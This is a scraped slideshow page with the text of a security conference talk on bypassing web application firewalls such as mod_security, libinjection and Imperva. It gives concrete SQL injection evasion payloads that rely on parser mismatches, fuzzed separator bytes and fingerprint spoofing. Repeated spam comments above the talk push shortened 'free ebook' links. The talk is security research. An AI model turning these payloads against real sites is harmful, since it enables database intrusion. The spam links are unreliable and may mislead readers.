Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Lie to Me: Bypassing Modern Web Application Firewalls

32,877 views

Published on

The report considers analysis of modern Web Application Firewalls. The author provides comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading for vectors of various attacks via WAFs for different algorithms.

Published in: Technology
  • DOWNLOAD THE BOOK INTO AVAILABLE FORMAT (New Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://urlzs.com/UABbn } ......................................................................................................................... Download Full EPUB Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download Full doc Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download PDF EBOOK here { https://urlzs.com/UABbn } ......................................................................................................................... Download EPUB Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download doc Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THE can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THE is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBOOK .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, CookBOOK, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, EBOOK, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THE Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THE the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THE Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THE BOOK INTO AVAILABLE FORMAT (New Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THE can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THE is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBOOK .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, CookBOOK, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, EBOOK, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THE Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THE the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THE Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Lie to Me: Bypassing Modern Web Application Firewalls

  1. 1. bypassing modern webapplication firewalls@ONsec_lab, http://lab.onsec.ru
  2. 2. About• Security audits of webapps since 2009• @d0znpp twitter• @ONsec_lab twitter• Nice blog! http://lab.onsec.ru - [ENG]• d0znpp[at]ONsec[dot]ru еmаi1
  3. 3. WTF WAF?• Web Application Firewall• Prevent attacks• Attack !=Vulnerability• Risk != Attack
  4. 4. SoftwareVS Hardware• Different HTTP parsers• Many «hardware» WAFs used Apache,Lighttpd, Nginx forks
  5. 5. Implementation• Failover bypass:• DoS/DDoS WAF for bypass it- why not?!• What happens with traffic when yourfilter is overloaded?• XML, regexp, token bombs for this• Not so silently, right? :)
  6. 6. WAF work stages• Parse HTTP packet from client (web serverto this in general case)• Determine rules that must be applied tocurrent URL/client/hostname/etc• Normalize data (2-nd urldecode, base64,etc)• Do detection logic (such as regexpr)• Make detection decision (true/false/score)
  7. 7. WAF work stages• Parse HTTP packet from client (web serverto this in general case)• Determine rules that must be applied tocurrent URL/client/hostname/etc• Normalize data (2-nd urldecode, base64,etc)• Do detection logic (such as regexpr)• Make detection decision (true/false/score)
  8. 8. Protocol level buglooks like abyss
  9. 9. Parse HTTP packets• First read: «Protocol-Level Evasion of WebApplication Firewalls», Ivan Ristic, BH-US-2012• Nice yesterday bypass Imperva by@webpentest during PHDays WAF bypasscontest: Content-Type: invalid :)))• Classic example - HTTP ParameterPollution• Are you sure that WAF’s and webapp’sHTTP protocols are the same?
  10. 10. WAF work stages• Parse HTTP packet from client (web serverto this in general case)• Determine rules that must be applied tocurrent URL/client/hostname/etc• Normalize data (2-nd urldecode, base64,etc)• Do detection logic (such as regexpr)• Make detection decision (true/false/score)
  11. 11. Data normalizationlevel bug looks liketunnel
  12. 12. Data normalization• Format parsers, for example:• base64• xml• JSON• Are you sure that WAF’s and webapp’sparsers are the same?
  13. 13. Data normalization• mod_security, t:base64decode• decode string until first = char• PHP, base64_decode($strict=false)• decode whole string• Attack vector• YWFh=attackhere• Use t:base64DecodeExt!
  14. 14. Data normalization• Yet another example from yesterdayPHDays WAF bypass contest - ImpervaXML decoding• First decode XML, that validate attacks• XML input was not set up as XML type inWAF• Put attack as XML-encoded data (entities)to bypass regexpr: union select 123
  15. 15. WAF work stages• Parse HTTP packet from client (web serverto this in general case)• Determine rules that must be applied tocurrent URL/client/hostname/etc• Normalize data (2-nd urldecode, base64,etc)• Do detection logic (such as regexpr)• Make detection decision (true/false/score)
  16. 16. Detection logic buglooks like ninja
  17. 17. Detection logic• Regular expressions (mod_security, etc)• Tokenizers (libinjection)• ...
  18. 18. SQL syntax• First read this works:• http://websec.wordpress.com/tag/sql-obfuscation/• http://www.slideshare.net/nickgsuperstar/new-techniques-in-sql-obfuscation• Obfuscated vector is more than welcome!• Try to exploit
  19. 19. SQL syntax - time tofuzzing!• SELECT{$P1} 1 FROM...• ...UNION{$P2}FROM...• SELECT VERSION{$P3}()• SELECT{$P4}VERSION{P4}()• SELECT 1{P5}BAD
  20. 20. MySQL: the classics• SELECT{U} 1 FROM• ...UNION{U}FROM...• SELECT VERSION{U}()• {U} = [0x09,0x0A-0x0D,0x20,0xA0]*• Fuzzed only 1-bytes sequences, not /**/, etc
  21. 21. MySQL: time to fuzzing!• SELECT{F}VERSION{F}()• SELECT 1{D}BAD• {F} = {U} + 0x60 (backquote `)• {D} = # + 0x60• Have a fun with regexp:• select`version` ( )• ... where id=’1’`’ and ... - commented now
  22. 22. MySQL: break tokens!• SELECT{O}1 FROM test• {O} = [-+!~@]• SELECT 1{W}FROM test;• {W} = [.d?|ed]• Part of this discovered during our WAFbypass contest last year by @Black2Fan
  23. 23. MySQL: break tokens!• SELECT-1e1FROM test• SELECT~1.FROM test• SELECTNFROM test• SELECT@^1.FROM test• SELECT-id-1.FROM test• all tested on MySQL 5.1.66-0-squeeze1
  24. 24. Postgres: the classics• SELECT{U} 1 FROM• ...UNION{U}FROM...• SELECT VERSION{U}()• {U} = [0x09,0x0A,0x0C,0x0D,0x20]*• Fuzzed only 1-bytes sequences, not /**/, etc
  25. 25. Postgres: time to fuzz!• SELECT{F}VERSION{F}()• SELECT 1{D}BAD• {F} = {U} + 0x22 (doblequote ‘’)• {D} = # + 0x22• Have a fun with regexp:• select’’version’’ ( )• ... where id=’1’`’ and ... - commented now
  26. 26. Postgres: break tokens!• SELECT{O}1 FROM test• {O} = [.-+!~@] - @ is absolute operator• SELECT 1{W}FROM test;• {W} = [.d?|ed|] - nothing is also OK!
  27. 27. Postgres: break tokens!• SELECT-1ROM test• SELECT.1FROM test• SELECT~1FROM test• SELECT-id-1FROM test• SELECT-id-1FROM test• all tested on PostgreSQL 9.2.4
  28. 28. Time to exploit!• mod_security• libinjection• others?
  29. 29. mod_security• CRS (https://github.com/SpiderLabs/owasp-modsecurity-crs)• base_rules• many regular expressions
  30. 30. mod_security• ?id=select id from test• ?id=select-id-1.from testMessage: Access denied with code 403 (phase 2). Pattern match "(?i:(?:unions*?(?:all|d i s t i n c t | [ ( ! @ ] * ? ) ? s * ? [ ( [ ] * ? s * ? s e l e c t s + ) | ( ? : w + s + l i ke s + [ " `xc2xb4xe2x80x99xe2x80x98])|(?:likes*?["`xc2xb4xe2x80x99xe2x80x98]%)|(?:["`xc2xb4xe2x80x99xe2x80x98]s*?likeW*?["`xc2xb4 ..." at ARGS:id. [file "/opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line"223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data"Matched Data: select id from found within ARGS:id: select id from test"] [severity"CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
  31. 31. mod_security• ?id=1 or 1=1 or• ?id=1 or true orMessage: Access denied with code 403 (phase 2). Pattern match "(?i:([s"` x c 2 x b 4 x e 2 x 8 0 x 9 9 x e 2 x 8 0 x 9 8 ( ) ] * ? ) ( [ d w ] + + ) ( [ s " `xc2xb4xe2x80x99xe2x80x98()]*?)(?:(?:=|<=>|r?like|soundss+like|regexp)([s"`xc2xb4xe2x80x99xe2x80x98()]*?)2|(?:!=|<=|>=|<>|<|>|^|iss+not|not ..." atA R G S : i d . [ fi l e " / o p t / m o d s e c u r i t y / r u l e s / b a s e _ r u l e s /modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg"SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found withinARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"][accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
  32. 32. libinjection• Token based detection• No more regexp!• Fingerprint for each attack 1-5 tokenssequence• 14 token types, 14^5+14^4+14^3+14^2+14~= 580k possible fingerprints• Is it enough to block all SQLi?
  33. 33. libinjection• Bytes obfuscation doesn’t works now• But...• What happens if you missed some tokens?
  34. 34. Attack #1. Missedtoken / fingerprint• As fuzzed above ` 0x60 byte can be used asa comment in MySQL and also as functionquotes• into outfile asd --• block - skksc• into outfile asd `• bypass - skksn
  35. 35. Attack #2.Tokenobfuscation• Find any unblocked fingerprint• Obfuscate your attack to produce the samefingerprint• Fingerprint have only 5 tokens• Need to exploit anti-obfuscation logic (1+1and others hardcoded token combinations)
  36. 36. Attack #2.Tokenobfuscation• Fingerprint «v1111» looks like safe• @a1a2a3a4 - variable but fingerprint of thisstring is «v», no numeric token here• @ф1й2у3ц4 - is valid variable for MySQL,but produce fingerprint «v1111»• @ф1й2у3ц4 union select ... producefingerprint «v1111» also :)
  37. 37. Some stats• Hacking WAFs since 2009• About 50 different implementations• About 10 different engines• Time to hack:• min: 3 min• max: 19 hours• average: 1hour
  38. 38. Questions?• @d0znpp twitter• @ONsec_lab twitter• Nice blog! http://lab.onsec.ru - [ENG]• d0znpp[at]ONsec[dot]ru еmаi1

×